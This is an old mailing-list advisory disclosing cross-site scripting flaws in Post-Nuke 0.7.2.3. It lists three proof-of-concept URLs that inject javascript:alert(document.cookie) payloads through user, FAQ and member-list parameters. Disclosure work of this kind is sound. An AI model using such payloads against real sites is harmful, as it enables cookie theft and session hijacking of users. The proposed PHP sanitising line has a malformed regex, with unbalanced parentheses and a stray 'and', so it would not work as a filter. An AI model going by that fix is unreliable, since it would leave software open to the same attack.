Cross site scripting in Post-Nuke

From: David F. Madrid (idoruat_private)
Date: Fri Jun 13 2003 - 03:28:09 PDT

    Issue :

    Cross site scripting in Post-Nuke

    Version affected :

    Post Nuke 0.7.2.3-Phoenix

    Description :

    Post-Nuke is a content management system that allow
    you to deploy a website easily . Its developers claim
    that their product is more secure than competitors .

    I found three places when a script can be injected to
    be executed in the context of the webpage , making possible
    to steal user cookies and hijack their sessions .

    http://www.server.com/user.php?op=confirmnewuser&module=NS-NewUser&uname=%22
    %3E%3Cimg%20src=%22javascript:alert(document.cookie);%22%3E&email=lucas@pelu
    cas.com

    http://www.server.com/modules.php?op=modload&name=FAQ&file=index&myfaq=yes&i
    d_cat=1&categories=%3Cimg%20src=javascript:alert(document.cookie);%3E&parent
    _id=0

    http://www.server.com/modules.php?letter=%22%3E%3Cimg%20src=javascript:alert
    (document.cookie);%3E&op=modload&name=Members_List&file=index

    Solution :

    Althoug I am not a php developer , I think filtering of all not
    alfanumeric characters is needed , not just filtering script
    tags passed to vars in the url .

    $good_var=eregi_replace("[^a-z0-9]+)and([^a-z0-9]+)","0",$var);

    You can find a spanish version of this advisory at

    http://nautopia.org/vulnerabilidades/postnuke_xss.htm

    Regards ,

    David F. Madrid ,
    Madrid , Spain